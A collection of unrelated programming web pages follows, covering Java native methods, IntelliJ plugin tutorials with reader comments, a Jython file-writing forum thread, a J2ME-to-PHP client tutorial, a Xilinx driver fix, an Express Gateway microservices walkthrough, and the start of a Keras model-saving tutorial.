Notice that this file includes jni.h, which contains interfacing information. This file is provided by your Java compiler. The header file NativeDemo.h was created by javah earlier. In this function, the GetObjectClass() method is used to obtain a C structure that has information about the class NativeDemo. The GetFieldID() method returns a C structure with information about the field named "i" for the class. GetIntField() retrieves the original value of that field. SetIntField() stores an updated value in that field. (See the file jni.h for additional methods that handle other types of data.)

After creating NativeDemo.c, you must compile it and create a DLL. To do this by using the Microsoft C/C++ compiler, use the following command line. (You might need to specify the path to jni.h and its subordinate file jni_md.h.)

cl /LD NativeDemo.c

This produces a file called NativeDemo.dll. Once this is done, you can execute the Java program, which will produce the following output:

This is ob.i before the native method: 10
Starting the native method.
i = 10
Ending the native method.
This is ob.i after the native method: 20
https://www.brainkart.com/article/Native-Methods---Java_10502/
Today we would like to share with you a simple tutorial on how to write a plugin with custom language support for IntelliJ IDEA and the IntelliJ Platform. As you know, IntelliJ IDEA provides powerful facilities for developers to implement advanced code assistance for custom languages and frameworks. In this step-by-step tutorial you will learn how to use Grammar-Kit to generate a parser and PSI elements, how to use JFlex to generate a lexer, how to implement custom formatting, refactoring support, etc. The sample code for this tutorial can be found on GitHub. More steps covering other aspects of plugin development are coming soon. In the meantime, don't miss the opportunity to register for the second live coding webinar about plugin development, which will take place on Tuesday, January 22.

Develop with Pleasure!

This is great! If only this was available a month ago, when I started playing with this. By now, I've figured out almost everything of this by myself, using the Erlang plugin and the Developing Custom Language Plugins for IntelliJ IDEA page (). I haven't needed the reference contributor, though. What is it needed for? Also, what I'm playing with now involves navigating across files. Stub indexes etc. Cool stuff, although I'm not sure I fully understand it. The Indexing and PSI Stubs in IntelliJ IDEA page () only provides a very basic introduction. Oh, and reference resolution. That's a pretty important topic, I'd suggest covering the scope processors stuff as well. It isn't needed for such an extremely simple language, but it's absolutely essential once you start playing with something real. Thank you!

Please share a tutorial on how to write a complete plugin for PyCharm ;) or an API Reference

Will such a custom language plugin only work in IntelliJ IDEA or also with the other IDEs, like PHPStorm or PyCharm?

Could you please also explain, on an example, how pin and recoverUntil work, as well as how to simplify the AST trees by using extends?

Awesome! This is great!
I noted that the “Lexer and Parser Definition” page is missing a step to create the SimpleFile class that is used in the parser definition. Looking forward to writing my first plugin now. @Alberto: It usually works in all IDEs, depends on how you define the metadata. @Alberto: please see for more information about making your plugin compatible with other IntelliJ based products @Tobias You are right, thanks. Fixed. +∞ to Luke. The GrammarKit documentation altogether would need some love, but the only important thing I really didn’t understand is pin/recoverUntil. Or actually, I think that I understand them (when a pinned element of the rule is successfully parsed, the rule itself will be considered successfully parsed, and the parser will eat all the following tokens until it reaches some tokens from the recoverUntil set), but I have a really hard time using them correctly. Basically, since I have a C-like syntax, I just settled with a single pinned element in a grammar and a single recoverUntil on ‘;’ or ‘}’. Everytime I try to add some more, the parser stops working and I have no idea why Ladislav, If you have any specific questions regarding the stubs/indexes, please ask, and we’ll update the document to make sure they’re covered. Konrad, Great product! This time its mine @Ladislav, @Luke Please check out and the 5 lines below. This is a perfectly working example of recoverUntil concept. @Sergey Thanks, but I was able to get to something very similar. I have a working rule with pin/recoverUntil in my grammar, just by following the documentation. That, however, isn’t enough to really understand. Once I get back to it, I will probably end up reverse engineering the concept from differences in generated code. Oh, and one thing I found just before few minutes. GrammarKit doesn’t support generating classes needed for stub indexes. It looks like it is possible to write all that manually, but it requires working around some GrammarKit bugs: 1. 
GrammarKit doesn’t like generics (extra interface for each StubBasedPsiElement needed), 2. GrammarKit doesn’t generate proper imports in generated visitor (and for this, there is a pull request with fix for more than 2 months!). And that’s only a beginning for me. may shed more light on grammar-kit error recovery The FindUsagesProvider-section uses an static word-scanner-instance. public WordsScanner getWordsScanner() { return WORDS_SCANNER; } As far as I know this will cause threading issues as the lexer is not thread safe. Is any way to extend existing ‘language plugin’ with minimal efforts? For example, i need plugin for Squirrel language: Its like slightly simplifier and abit extended version of Java. Thanks for the tutorial, but IntelliJ doesn’t seem to associate the file type specified with my language after following step 2: Language and file type. Totally agreed that this is an outstanding tutorial! However, like Luke and Ladislav, I still don’t quite understand how best to use pin and recoverUntil, even after looking at the Erlang grammar. The language I’m implementing is very Java-like, and I’ve made some progress with pins so that I now get “foo expected, found bar” most of the time, but I have a feeling I’m abusing it rather than using it. Also, every time I try to use recoverUntil, primarily by using an expression such as “!(SEMICOLON | RBRACE)”, I just end up tanking the parser. I’d be happy to share a few simple rules from my grammar as concrete examples of those help the discussion. I’m sorry but while this “tutorial” may be a good start to see what operations must be done in which order, it’s not even close to being a tutorial. It’s a recipe, there is almost no explanation for most of the steps and the reader is just led blindly through it. And the example is not practical either. I understand it has to be simple, but like so many examples it just lacks the fundamental links people need in order to build an actual case. 
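For those still puzzled by pin and recoverUntil, a rough sketch of how I understand them: pin=N commits a rule once its first N elements have matched, so a later mismatch produces an error marker ("foo expected") instead of silently backtracking out of the rule, while the recovery predicate names the tokens the parser may consume while resynchronizing after such an error. A hypothetical C-like rule (rule and token names are illustrative, not taken from this tutorial's Simple language):

```bnf
// After IF and LPAREN have matched (pin=2), the rule is committed: a broken
// condition yields "expected ..." errors instead of abandoning the rule.
if_statement ::= IF LPAREN expr RPAREN block {pin=2 recoverUntil=statement_recover}

// The parser consumes tokens while this predicate holds, i.e. it stops at
// tokens that can end the current statement or start the next one.
private statement_recover ::= !(SEMICOLON | RBRACE | IF | IDENTIFIER)
```

Whether the not-predicate should be written in exactly this form depends on the Grammar-Kit version; if recovery seems to eat too much input, inspecting the generated parser code is the most reliable way to see what the attributes actually produced.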
What for example if I want to build a real parser, it will have to let the grammar get some information from what the lexer is sending (number value, identifier string, …). The JFlex documentation shows how to define a type that contains this information but here it’s all really fuzzy, I gather that somehow it has to be based on IElementType but then what? If I scan a string, where do I put the contents? If it’s an integer, where should the value go? This could be a basic grammar, no need for complex stuff, but at least it would show the reader how to do practical things. Is there any good example of a language plugin out there which is based on a JFlex lexer and a .bnf grammar definitions? The only ones I found did their own recipe for the grammar part, either with Scala routines or home-made code which seems to amount to ten times the effort (or even trying to squeeze part of the grammar in the lexer, which makes it even worse). Thanks for all the work done so far anyway @Noah I’ve just started with plugin development for a custom language and even I have the same feeling did you get to find any resources or tutorials which could have helped you? Thanks in advance Same feeling here. After 2 years, the sources on Github are no longer available, too. I figured out with some search/try/error how to go some steps but this really is no tutorial. Just looking at the erlang-plugin and the provided information of the grammar-kit project on Github gave me more insight. I be happy to see this tutorial extended with some more text or a least updated so that the example sources are available again The updated tutorial is available at The sources moved to And actually it doesn’t work. If you take the project from Git, it compiles the first time. Try and generate the parser from the BNF file and it all goes haywire. Generated parser: import static com.simpleplugin.parser.GeneratedParserUtilBase.*; [...] 
builder_ = adapt_builder_(root_, builder_, this, null); In the GeneratedParserUtilBase.java file, you realize that the static constructor has a different signature: public static PsiBuilder adapt_builder_(IElementType root, PsiBuilder builder, PsiParser parser) And by the way, the GeneratedParserUtilBase.java file you provide as a separate link is completely different and also incompatible. It already starts with this: package org.intellij.grammar.parser; which is actually a different package! What a mess. Why isn’t that file part of the SDK in the first place, as should the GrammarKit, it’s the best way to ensure consistency between those parts. Trying to change the package to match the com.simpleplugin.parser is not enough. Now the PsiBuilder type is missing the .rawTokenIndex() method, PsiBuilderImpl.ProductionMarker is missing the .getStartIndex() method. Trying to change the SDK from 129.1359 to 133.286, regenerating parser. Nope, now PsiBuilder.rawTokenIndex() is there, but PsiBuilderImpl.ProductionMarker is still missing getStartIndex(), plus a new getEndIndex() method… I’m giving up for now, the lack of documentation or at least of a relevant example, the inconsistency between those parts, make it too much trouble to use. Back to Eclipse and Xtext I guess, a shame. Found the bug, apparently this line has to be changed in the BNF, since this file IS indeed part of the SDK and doesn’t need to be included from elsewhere: stubParserClass=”com.intellij.lang.parser.GeneratedParserUtilBase” It only works with SDK 133.286 though, with the other ones it produces more errors that I will care to report. So it finally compiles. Then all the unit tests but one fail in SimpleCodeInsight. The SimpleParsingTest simply crashes… For anyone encountering this issue I can run with the current master by NOT using the supplied ‘light-psi-all.jar’ and instead using my current install of intellij. 
java -cp ‘/path/to/grammar-kit.jar:/path/to/intellij/lib/*’ org.intellij.grammar.Main gen src/bnf/MyGrammar.bnf I want to navigate from variable to its declaration etc, but i dint find any anything related to navigation in the tutorial. can somebody please help me out for the same. Got all of this compiling and working in debug mode, but when you deploy the plugin and try it for real it loads with no errors, but none of the functionality is there. Any ideas why ? Cheers Adam the github link is 404 Yes, it moved. The correct link is Hi! I am trying to build similar plugin, is there any possiblity to create such a plugin without BNF file? We cannot find the proper file in the Internet and the language is much more complicated than than example one. I figured out that the DSL definition (syntax) and Editor styles are much easier configure in MPS as to code it. But unfortunately its not possible to export it as a plain Custom Language Support Plugin. Thats really a pitty. Or do I understand something wrong here/their? Hi, very old post but still I have to ask. Is there any real tutorial with explanations for writing a language plugin? Because based on what JetBrains offers I can get a working example , but with literally 0 understanding on whats going on. Hi David, check those links:
https://blog.jetbrains.com/idea/2013/01/how-to-write-custom-language-support-plugins/?replytocom=439804
Hi all, can you please help in suggesting syntax for saving an .xls file to a specific location on my system?

data = event.source.parent.getComponent('WMpwmName').text
filename = system.file.saveFile("padid2excel.xls")
filePath = "E:\padid2excel.xls"
if filename != None:
    system.file.writeFile(filename, data)

Hi all, I want to save without user interaction. Thanks.

Use the FileWriter from the Java standard library:

from java.io import File, FileWriter
file = File(path)
fw = FileWriter(file, False)
fw.write(data)
fw.close()

Thanks a lot, bfuson!! Is it possible to append data to the same file instead of opening a new file? I attempted to use FileWriter(file, true) but it is throwing an error.

The error would be helpful, but if you are saving an XLS file then you cannot just append to the file. A structured document like most Office files requires that everything be saved in a particular way, so appending would essentially make the file unreadable to Excel.

Hi Philip,

from java.io import File, FileWriter
file = File(path)
fw = FileWriter(file, true)  # "true is not defined" in line #3
fw.write(data)
fw.close()

Error was: "true is not defined" in line #3. I tried saving the file as CSV instead of XLS format, so that it will not throw a prompt when opened. Please let me know if I can do it another way.

Just a case-sensitivity issue in that case, try:

FileWriter(file, True)
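Ignition's scripting runs Jython, which is why the accepted answer reaches for Java's FileWriter. For comparison only, here is a minimal sketch of the same append-to-a-CSV pattern in standard CPython, using only the standard library; the file name and rows are placeholders, not values from the thread:

```python
import csv
import os

def append_row(path, row):
    """Append a single row to a CSV file, creating it with a header if needed."""
    is_new = not os.path.exists(path)
    # Mode "a" appends instead of truncating, mirroring FileWriter(file, True)
    with open(path, "a", newline="") as f:
        writer = csv.writer(f)
        if is_new:
            writer.writerow(["timestamp", "value"])  # header written only once
        writer.writerow(row)

append_row("padid2excel.csv", ["2021-01-01 00:00", 42])
append_row("padid2excel.csv", ["2021-01-01 00:05", 43])
```

Because CSV is plain text, appending line by line like this keeps the file readable, which is exactly what an .xls container would not tolerate.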
https://forum.inductiveautomation.com/t/save-xls-file-to-specific-path/17228
PHP is often chosen for the server page because PHP hosting is the most widely available. Here is the J2ME program: it gets a number from the user and sends it to the PHP page on the server. The server reads it and sends the necessary output in return.

/*
 * Client.java
 *
 * Created on August 17, 2007, 11:42 AM
 */
import javax.microedition.midlet.*;
import javax.microedition.lcdui.*;
import java.io.*;
import javax.microedition.io.*;

/**
 * @author ahsan
 * @version
 */
public class Client extends MIDlet implements CommandListener {
    private Display display;
    private Form form;
    private Command cQuit, cOk;
    private String url = "";
    private String part = "";
    private TextField f;
    HttpConnection http;
    InputStream in;
    OutputStream out;
    int rc;

    public void startApp() {
        display = Display.getDisplay(this);
        form = new Form("Client");
        cQuit = new Command("Quit", Command.EXIT, 1);
        cOk = new Command("OK", Command.OK, 1);
        f = new TextField("Query", "", 10, TextField.NUMERIC);
        form.addCommand(cQuit);
        form.addCommand(cOk);
        form.setCommandListener(this);
        form.append(f);
        display.setCurrent(form);
    }

    public void processGet() throws Exception {
        http = (HttpConnection) Connector.open(url + part);
        rc = http.getResponseCode();
        // read the response character by character into a buffer
        in = http.openInputStream();
        StringBuffer buff = new StringBuffer();
        int ch;
        while ((ch = in.read()) != -1) {
            buff.append((char) ch);
        }
        form.append(new StringItem("Response: ", buff.toString()));
        if (in != null) in.close();
        if (out != null) out.close();
        if (http != null) http.close();
    }

    public void commandAction(Command com, Displayable d) {
        if (com == cQuit) {
            destroyApp(true);
            notifyDestroyed();
        } else if (com == cOk) {
            part = f.getString().trim();
            try {
                processGet();
            } catch (Exception o) {
                o.printStackTrace();
            }
        }
    }

    public void pauseApp() {
    }

    public void destroyApp(boolean unconditional) {
    }
}

Now here is the PHP page that reads the data from the J2ME client and returns the necessary output to the J2ME client's display:

hello.php

<?php
$response = "Hello, every body";
if (isset($_GET["type"])) {
    switch ($_GET["type"]) {
        case 1:
            $response = "Good Morning";
            break;
        case 2:
            $response = "Good evening";
            break;
        case 3:
            $response = "Visit:";
            break;
        default:
            $response = "Hi to all";
    }
}
echo "$response";
?>

Please use this syntax in the PHP page when using the POST method in both the J2ME client and the PHP page:

if ($_SERVER['REQUEST_METHOD'] == 'POST')
    $str = trim(file_get_contents('php://input')); // get the raw POST data

June 14, 2008 at 12:07 pm
Assalamu alaikum. Nice to see your work as a PHP and J2ME expert. Would you mind if I ask for some technical help in this domain? I am waiting to hear from you.

December 25, 2008 at 6:32 am
Hello! Thanks for the example above; it works great. However, I'm a bit confused about the POST method. Is it possible for you to send me a piece of code? Thanks.

March 4, 2009 at 9:03 am
Please tell me the code for transmitting an image from the server and saving it to the server using J2ME and PHP…

April 19, 2009 at 11:22 pm
Please help me with my project; it is to build a client (student) who accesses a server to see his notes via J2ME. Thank you all.

April 19, 2009 at 11:23 pm
This is my e-mail: youcef.cherif@gmail.com

May 8, 2009 at 3:53 pm
Nice job, this would be a great help to me, as I am connecting MySQL and J2ME via a server-side language, PHP, as it is the most flexible… 🙂 Thanks

May 8, 2009 at 3:54 pm
I am wondering if you can send me the code for the POST method. My mail id is tosha9@gmail.com…

December 15, 2009 at 7:11 am
Good article.

January 17, 2010 at 4:59 pm
Good one, thank you.

May 21, 2010 at 5:47 pm
Good work… but to avoid deadlock, allocate a separate worker thread for the HTTP connection; otherwise the GUI will become unresponsive. Here's the modification:

public void processGet() throws Exception {
    // Create a thread to actually connect to the webserver
    Thread t = new Thread() {
        public void run() {
            try {
                http = (HttpConnection) Connector.open(url + part);
                http.setRequestMethod(HttpConnection.GET);
                ....
            }
        }
    };
    t.start();
}

Thanks

February 1, 2011 at 11:22 am
Great article.

March 9, 2011 at 7:32 pm
Hi, great job. I am doing research on remote monitoring using J2ME, as the client is a mobile device. I will be thankful if you show me how I can access a file through J2ME. Much appreciated!

October 15, 2011 at 11:01 am
What is the difference between InputStream and DataInputStream? I am still confused about that. Thanks in advance.

June 7, 2013 at 4:58 pm
This post, "Communication between J2ME client and PHP page in server | Think Different", was excellent. I'm making out a copy to show my personal pals. I appreciate it, Delila

August 2, 2013 at 10:38 pm
"Communication between J2ME client and PHP page in server | Think Different" was indeed a beneficial post. If only there were significantly more weblogs like this one on the world wide web. Well, thanks for your precious time, Pamela

August 3, 2013 at 6:34 am
I wonder why you titled this post "Communication between J2ME client and PHP page in server | Think Different". In any event I admired the post! Thanks for the post, Seth

August 3, 2013 at 2:33 pm
"Communication between J2ME client and PHP page in server | Think Different" really enables me to imagine a little bit more. I adored every single portion of it. Thanks for your effort, Tawanna

August 4, 2013 at 7:13 am
"Communication between J2ME client and PHP page in server | Think Different" was indeed a truly nice blog post. I hope you keep publishing and I'm going to keep browsing! Thanks a lot, Lance

October 8, 2014 at 12:20 pm
I am really grateful to the holder of this web page who has shared this great paragraph at this place.
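The hello.php page above maps the numeric type query parameter to a response string. As an illustration only, not code from the original post, the same dispatch can be sketched framework-free in Python with a lookup table standing in for the PHP switch:

```python
def respond(params):
    """Toy equivalent of hello.php: pick a response from the 'type' parameter."""
    responses = {
        "1": "Good Morning",
        "2": "Good evening",
        "3": "Visit:",
    }
    if "type" not in params:
        return "Hello, every body"
    # Unknown values fall through to the PHP switch's default branch
    return responses.get(params["type"], "Hi to all")

print(respond({"type": "1"}))
print(respond({}))
```

The J2ME client would then simply append ?type=N to the request URL, and the string returned here is what the MIDlet reads from the input stream and shows in the StringItem.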
https://mahmudahsan.wordpress.com/2008/02/21/communication-between-j2me-client-and-php-page-in-server/
This issue occurs if a simple IP is created with an AXI interface with register access and soft reset, and if the "create a sample driver" box is ticked in the CIP wizard. If this project is exported to SDK with the driver included in the repository, or using the example code provided in the driver, the SDK will fail in libgen, noting that xio.h or xbasic_types.h cannot be found, or that <IP_NAME>_USER_NUM_REG cannot be defined. How can I fix this?

This is a known issue. To fix it, open the driver source files created in the CIP wizard, seen below.

<IP_NAME>.h

Change the following:

#include "xio.h"
#include "xbasic_types.h"

to:

#include "xil_io.h"
#include "xil_types.h"

<IP_NAME>selftest.c

Change the following:

#include "xio.h"

to:

#include "xil_io.h"
#include "xil_types.h"

and add:

#define <IP_NAME>_USER_TEST_NAME <IP_NAME>_AXI_LITE_USER_NUM_REG
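Since the fix is a pair of plain-text substitutions, it can also be scripted across the generated driver sources. The sketch below is illustrative only and not part of the Xilinx answer record; the substitution table is taken from the fix above, while the helper function itself is hypothetical:

```python
# Map of deprecated includes to their replacements in the generated driver
SUBSTITUTIONS = {
    '#include "xio.h"': '#include "xil_io.h"',
    '#include "xbasic_types.h"': '#include "xil_types.h"',
}

def patch_driver_source(text):
    """Return driver source text with the deprecated includes replaced."""
    for old, new in SUBSTITUTIONS.items():
        text = text.replace(old, new)
    return text

sample = '#include "xio.h"\n#include "xbasic_types.h"\n'
print(patch_driver_source(sample))
```

Running this over <IP_NAME>.h and <IP_NAME>selftest.c applies the same edits as the manual instructions; the extra #define for the self-test still has to be added by hand.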
http://www.xilinx.com/support/answers/54352.html
When creating software products that need to be highly scalable, a microservices app looks like the simplest solution. During my journey as a software developer, working on a project that required the software to accommodate nearly a million users on demand, I have seen and felt that microservices solve the problem of proper utilisation of resources and increase the scalability of different services. They remove coupling between different services and help them run independently.

What is an API Gateway?

One of the most fundamental requirements of creating microservices is the API gateway. An API gateway is an infrastructure layer that sits in front of the microservices. Its purpose is to serve requests from the client by routing them to the right microservice. This article is about how to create a very simple Node.js microservices application with the help of a Dockerized Express API Gateway.

Prerequisites

This sample project requires a few things:

- Docker (v19.03.2 or above) installed on your machine.
- Node v10 or above.
- Basic knowledge of Docker commands.
- Ngrok or any other free tunnelling service for exposing localhost to the web.

I am doing this project on Mac OS X 11.4.

Getting the Docker image of Express Gateway and running it

Run the command below in your terminal to pull the Docker image:

docker pull express-gateway

After pulling the image, create a folder and name it Config. Open a terminal in that folder and run the commands below:

touch gateway.config.yml
touch system.config.yml

First, copy and paste the YAML code below into gateway.config.yml.
(I used the Sublime Text editor to do this, but any other text editor is fine.)

http:
  port: 8080
admin:
  port: 9876
  host: localhost
apiEndpoints:
  api:
    host: localhost
    paths: '/ip'
serviceEndpoints:
  httpbin:
    url: ''
policies:
  - basic-auth
  - cors
  - expression
  - key-auth
  - log
  - oauth2
  - proxy
  - rate-limit
pipelines:
  default:
    apiEndpoints:
      - api
    policies:
      # Uncomment `key-auth:` when instructed to in the Getting Started guide.
      # - key-auth:
      - proxy:
          - action:
              serviceEndpoint: httpbin
              changeOrigin: true

Copy and paste the YAML code below into the system.config.yml file.

# Core
db:
  redis:
    emulate: true
    namespace: EG

#plugins:
#  express-gateway-plugin-example:
#    param1: 'param from system.config'

crypto:
  cipherKey: sensitiveKey
  algorithm: aes256
  saltRounds: 10

# OAuth2 Settings
session:
  secret: keyboard cat
  resave: false
  saveUninitialized: false

accessTokens:
  timeToExpiry: 7200000
refreshTokens:
  timeToExpiry: 7200000
authorizationCodes:
  timeToExpiry: 300000

Now create another folder, named models, inside Config. Open a terminal in models and run the commands below to create three files:

touch applications.json
touch credentials.json
touch users.json

Copy and paste the code below into applications.json.
{
  "$id": "",
  "type": "object",
  "properties": {
    "name": { "type": "string" },
    "redirectUri": { "type": "string", "format": "uri" }
  },
  "required": ["name"]
}

After that, copy and paste the code below into credentials.json.

{
  "$id": "",
  "type": "object",
  "definitions": {
    "credentialBase": {
      "type": "object",
      "properties": {
        "autoGeneratePassword": {
          "type": "boolean",
          "default": true
        },
        "scopes": {
          "type": ["string", "array"],
          "items": { "type": "string" }
        }
      },
      "required": ["autoGeneratePassword"]
    }
  },
  "properties": {
    "basic-auth": {
      "allOf": [
        { "$ref": "#/definitions/credentialBase" },
        {
          "type": "object",
          "properties": {
            "passwordKey": { "type": "string", "default": "password" }
          },
          "required": ["passwordKey"]
        }
      ]
    },
    "key-auth": {
      "type": "object",
      "properties": {
        "scopes": {
          "type": ["string", "array"],
          "items": { "type": "string" }
        }
      }
    },
    "jwt": {
      "type": "object",
      "properties": {}
    },
    "oauth2": {
      "allOf": [
        { "$ref": "#/definitions/credentialBase" },
        {
          "type": "object",
          "properties": {
            "passwordKey": { "type": "string", "default": "secret" }
          },
          "required": ["passwordKey"]
        }
      ]
    }
  }
}

Lastly, copy and paste the code below into users.json.

{
  "$id": "",
  "type": "object",
  "properties": {
    "firstname": { "type": "string" },
    "lastname": { "type": "string" },
    "username": { "type": "string" },
    "email": { "type": "string", "format": "email" },
    "redirectUri": { "type": "string", "format": "uri" }
  },
  "required": ["username", "firstname", "lastname"]
}

For this article, we will only focus on configuring the gateway.config.yml file. I will walk through that after setting up and running the Docker container.

Now that our Config folder is all ready, run the Docker command below to spin up a container:

docker run -d --name express-gateway \
  -v /Users/naseef/Config:/var/lib/eg \
  -p 8080:8080 \
  -p 9876:9876 \
  express-gateway

For our Express Gateway Docker container to work properly, we need to mount a volume containing the configuration files.
The Config folder will be mounted, and it contains all the configuration files inside it. Please replace '/Users/naseef/Config' in the Docker command above with your own path to the Config folder. This should start and run the Docker container named express-gateway. To make sure it is running, run docker ps in the terminal and check.

Creating two simple microservices with two endpoints

We are going to create two GET endpoints to act as our microservices. Create a folder in any directory of your choice named Actor. Set up an Express server in this folder. I used the npm init command to set up my package.json, but you can choose other ways to set up the Express server. After creating package.json, run npm install express --save in Actor to install Express. Create a file named actor.js and paste the code below.

let express = require('express');
let app = express();

app.listen(3000, () => {
    console.log("Server running on port 3000");
});

app.get("/actors", (req, res, next) => {
    let array_actors = [
        "Tom Cruise",
        "Johnny Depp",
        "Di Caprio",
        "Russel Crowe",
        "Tom Hanks"
    ];
    res.json(array_actors);
});

Run node actor.js to start this server on port 3000 of localhost. Hit the browser (or use Postman) with this URL. The result should be like this:

[
    "Tom Cruise",
    "Johnny Depp",
    "Di Caprio",
    "Russel Crowe",
    "Tom Hanks"
]

In the same way as above, create a Movie folder, set up an Express server and create a file named movie.js. Add the code below to the movie.js file:

let express = require('express');
let app = express();

app.listen(8000, () => {
    console.log("Server running on port 8000");
});

app.get("/movies", (req, res, next) => {
    let array_movies = [
        "Mission Impossible",
        "Pirates of Carribean",
        "Inception",
        "Gladiator",
        "The Terminal"
    ];
    res.json(array_movies);
});

Run node movie.js to start this server on port 8000 of localhost. Hit the browser (or use Postman) with this URL. The output should be something like this:
[
    "Mission Impossible",
    "Pirates of Carribean",
    "Inception",
    "Gladiator",
    "The Terminal"
]

Ngrok to expose the GET endpoints on the web

Use Ngrok to expose ports 3000 and 8000 on the web. If you have trouble running two Ngrok sessions at the same time, follow this link. I will leave the details of exposing the API on the web through Ngrok out of the scope of this tutorial.

Upon exposing the endpoints with Ngrok, we have the endpoints below for the services.

Movie services:

Actor services:

Now that we have two running microservices, it is time to configure our gateway.config.yml file to route both of these services through our Dockerized gateway.

Configure the gateway.config.yml file of Express Gateway

The Express Gateway accepts requests from clients and directs them to the microservice in charge of the particular request. For example, if an actors request is made through the gateway, the request is directed to the actor microservice, and a movies request is directed to the movie microservice. In summary, each request is accepted through one server and directed to its respective host. Let's set up our Docker container to implement this.

Expose the endpoints to the gateway

- Navigate into the Config folder.
- Open the gateway.config.yml file.

In the apiEndpoints section, we create an API endpoint named "actors" and define the host and path. The path defined is an array of paths we would like to match. This is to cover all URLs that match the path pattern. Repeat the same for the movies endpoint. For further details about matching patterns for hostnames and paths, check out the Express Gateway endpoint documentation. With these, the Express Gateway can accept external APIs (requests from the client) of these formats: '' or '*'

Create the service endpoints in the gateway

The service endpoints are the endpoints of our microservices, in this case the actor and movie microservices. External requests arriving at the API endpoints are directed to the service endpoints.
In the serviceEndpoints section, still in the same gateway.config.yml file, we create services and define their URLs. For actors, we call the service endpoint actorService and add its endpoint URL ''. Repeat the same for the movie service endpoint.

Finishing up this long post!

Now let's tie up the API endpoints and the service endpoints. This is configured in the pipelines section, where we connect the API endpoints and the service endpoints. You will find that a default has been pre-defined, so we just need to define ours. You can copy and paste the default pipeline and then change some of the details. We name our pipeline "actorPipeline" and add the endpoint name, which is "actors". Find the serviceEndpoint in the proxy policy of the actorPipeline pipeline and add our service endpoint name, which is "actorService". Repeat the procedure for the movie pipeline.

http:
  port: 8080
admin:
  port: 9876
  host: localhost
apiEndpoints:
  api:
    host: localhost
    paths: '/ip'
  actors:
    host: localhost
    paths: ['/actors', '/actors/*']
  movies:
    host: localhost
    paths: ['/movies', '/movies/*']
serviceEndpoints:
  httpbin:
    url: ''
  actorService:
    url: ''
  movieService:
    url: ''
policies:
  - basic-auth
  - cors
  - expression
  - key-auth
  - log
  - oauth2
  - proxy
  - rate-limit
pipelines:
  actorPipeline:
    apiEndpoints:
      - actors
    policies:
      # Uncomment `key-auth:` when instructed to in the Getting Started guide.
      # - key-auth:
      - proxy:
          - action:
              serviceEndpoint: actorService
              changeOrigin: true
  moviePipeline:
    apiEndpoints:
      - movies
    policies:
      # Uncomment `key-auth:` when instructed to in the Getting Started guide.
      # - key-auth:
      - proxy:
          - action:
              serviceEndpoint: movieService
              changeOrigin: true
  default:
    apiEndpoints:
      - api
    policies:
      # Uncomment `key-auth:` when instructed to in the Getting Started guide.
      # - key-auth:
      - proxy:
          - action:
              serviceEndpoint: httpbin
              changeOrigin: true

Now our whole system is ready. Save the gateway.config.yml file and restart the Docker container.
docker restart express-gateway

The Ngrok and Node services should still be running. If everything is functioning properly, we should get the proper output by using our URLs.

This is the end of this microservices app creation with a Dockerized Express Gateway. If you face any errors or difficulties, feel free to comment below. Thank you. Happy coding.
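As a conceptual aside, the path-prefix matching that the gateway's pipelines perform can be sketched in a few lines of Python. This is a toy dispatch table for illustration, not Express Gateway's actual matching logic, and the backend URLs are placeholders standing in for the Ngrok service endpoints:

```python
# Map API path prefixes to backend service endpoints (placeholder URLs)
ROUTES = {
    "/actors": "http://localhost:3000",
    "/movies": "http://localhost:8000",
}

def route(path):
    """Return the backend a request path should be proxied to, or None.

    Mirrors the paths: ['/actors', '/actors/*'] patterns: an exact match
    or anything under the prefix selects that pipeline's service endpoint.
    """
    for prefix, backend in ROUTES.items():
        if path == prefix or path.startswith(prefix + "/"):
            return backend
    return None

print(route("/actors"))    # actor service
print(route("/movies/1"))  # movie service
print(route("/unknown"))   # no pipeline matches
```

The real gateway adds the policy chain (auth, rate limiting, proxying) on top, but the routing decision itself is exactly this kind of prefix lookup.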
https://practicaldev-herokuapp-com.global.ssl.fastly.net/naseef012/create-a-microservices-app-with-dockerized-express-api-gateway-1kf9
Keras is a simple and powerful Python library for deep learning. Given that deep learning models can take hours, days and even weeks to train, it is important to know how to save and load them from disk. In this post, you will discover how you can save your Keras models to file and load them up again to make predictions. Let's get started.

- Update Mar 2017: Added instructions to install h5py first. Added missing brackets on the final print statement in each example.
- Update Mar 2017: Updated example for Keras 2.0.2, TensorFlow 1.0.1 and Theano 0.9.0.

Save and Load Your Keras Deep Learning Models
Photo by art_inthecity, some rights reserved.

Tutorial Overview

Keras separates the concerns of saving your model architecture and saving your model weights. Model weights are saved to HDF5 format. This is a grid format that is ideal for storing multi-dimensional arrays of numbers. The model structure can be described and saved using two different formats: JSON and YAML.

In this post we are going to look at two examples of saving and loading your model to file:

- Save Model to JSON.
- Save Model to YAML.

Each example will also demonstrate saving and loading your model weights to HDF5 formatted files. The examples will use the same simple network trained on the Pima Indians onset of diabetes binary classification dataset. This is a small dataset that contains all numerical data and is easy to work with. You can download this dataset and place it in your working directory with the filename "pima-indians-diabetes.csv".

Confirm that you have the latest version of Keras installed (v1.2.2 as of March 2017). Note: you may need to install h5py.

Save Your Neural Network Model to JSON

JSON is a simple file format for describing data hierarchically. Keras provides the ability to describe any model using JSON format with a to_json() function. This can be saved to file and later loaded via the model_from_json() function that will create a new model from the JSON specification.
Running this example provides the output below. The JSON format of the model looks like the following:

Save Your Neural Network Model to YAML

This example is much the same as the JSON example above, except the YAML format is used for the model specification. The model is described using YAML, saved to the file model.yaml and later loaded into a new model via the model_from_yaml() function. Weights are handled in the same way as above, in HDF5 format as model.h5. Running the example displays the following output. The model described in YAML format looks like the following:

Further Reading

- How can I save a Keras model? in the Keras documentation.
- About Keras models in the Keras documentation.

Summary

In this post, you discovered how to serialize your Keras deep learning models. You learned how you can save your trained models to files and later load them up and use them to make predictions. You also learned that model weights are easily stored using HDF5 format and that the network structure can be saved in either JSON or YAML format. Do you have any questions about saving your deep learning models?

I am grateful to you for sharing knowledge through this blog. It has been very helpful for me. Thank you for the effort. I have one question: when I execute Keras code to load YAML/JSON data I see the following error.
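The split between architecture and weights can be illustrated without Keras at all. The sketch below mimics the pattern, a JSON file for the structure and a separate file for the parameters, using only the standard library. The "model" here is a made-up dict standing in for a real network, and Keras itself stores weights in HDF5 rather than JSON:

```python
import json

def save_model(structure, weights, json_path, weights_path):
    """Save the architecture as JSON and the weights to a separate file."""
    with open(json_path, "w") as f:
        json.dump(structure, f)
    with open(weights_path, "w") as f:
        json.dump(weights, f)  # Keras would use HDF5 here instead

def load_model(json_path, weights_path):
    """Rebuild the (structure, weights) pair from the two files."""
    with open(json_path) as f:
        structure = json.load(f)
    with open(weights_path) as f:
        weights = json.load(f)
    return structure, weights

# Toy stand-ins for to_json() output and layer weight arrays
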